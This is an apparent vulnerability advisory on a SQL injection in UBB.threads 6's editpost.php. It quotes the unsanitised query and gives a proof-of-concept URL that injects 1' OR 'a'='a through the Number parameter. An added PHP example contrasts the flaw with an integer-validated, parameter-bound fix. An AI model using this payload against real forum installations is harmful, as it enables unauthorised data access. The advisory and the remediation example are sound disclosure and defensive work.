ADZ Security Team
===================
Info
Program: UBB.threads
Version: 6
Module: editpost.php
Bug type: SQL Injection
Vendor site: http://www.ubbcentral.com/ubbthreads/
===================
Bug description
In editpost.php we can see this code:

// START
$Cat = get_input("Cat","get");
$Board = get_input("Board","get");
$Number = get_input("Number","get");
$page = get_input("page","get");
$what = get_input("what","get");
$vc = get_input("vc","get");
// ...........
$query = "
SELECT B_Posterid,B_Subject,B_Body,B_Approved,B_Kept,B_Status,B_Main,B_Sticky,
B_Posted,B_Icon,B_Poll,B_Convert,B_Topic,B_CalDay,B_CalMonth,B_CalYear,
B_AddSig,B_Board
FROM {$config['tbprefix']}Posts
WHERE B_Number = '$Number'
";
//..........
// END

As we see, $Number is not checked as an int value before it goes into the query, so... :)
===================
Example/PoC:
http://[host]/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a
===================
Contact
ADZ Security Team // http://adz.void.ru/
kreon // kre0n@mail.ru, adz.kreon@gmail.com
===================
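
Added example, not part of the original advisory and not UBB.threads code: the unchecked $Number from the bug description above, next to a form that validates it as an integer and binds it as a query parameter. Assumptions: PDO with an in-memory SQLite table named Posts stands in for the forum's database layer, the rows are constructed, and the function names fetch_post_concat and fetch_post_checked are hypothetical.

```php
<?php
// Added example, not UBB.threads code. An in-memory SQLite table stands in
// for {$config['tbprefix']}Posts; the rows are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE Posts (B_Number INTEGER PRIMARY KEY, B_Posterid INTEGER, B_Subject TEXT)");
$db->exec("INSERT INTO Posts VALUES (1, 10, 'first'), (2, 11, 'second'), (3, 12, 'third')");

// Pattern from the advisory: the request value is pasted between the quotes,
// so a quote character inside it changes the WHERE clause itself.
function fetch_post_concat(PDO $db, string $Number): array
{
    $query = "SELECT B_Posterid, B_Subject FROM Posts WHERE B_Number = '$Number'";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form (hypothetical helper): accept only a positive decimal integer,
// then pass it as a bound parameter so it can never alter the SQL text.
function fetch_post_checked(PDO $db, string $Number): array
{
    $id = filter_var($Number, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('Number must be a positive integer');
    }
    $stmt = $db->prepare('SELECT B_Posterid, B_Subject FROM Posts WHERE B_Number = :n');
    $stmt->bindValue(':n', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The Number value from the advisory's Example/PoC line, URL-decoded.
$fromUrl = "1' OR 'a'='a";

echo 'concatenated query, PoC value: ', count(fetch_post_concat($db, $fromUrl)), " row(s)\n";
echo 'checked query, Number=2:       ', count(fetch_post_checked($db, '2')), " row(s)\n";
try {
    fetch_post_checked($db, $fromUrl);
} catch (InvalidArgumentException $e) {
    echo 'checked query, PoC value:      rejected (', $e->getMessage(), ")\n";
}
```

The integer check alone closes this instance; the bound parameter keeps the query safe even if a later change loosens the validation.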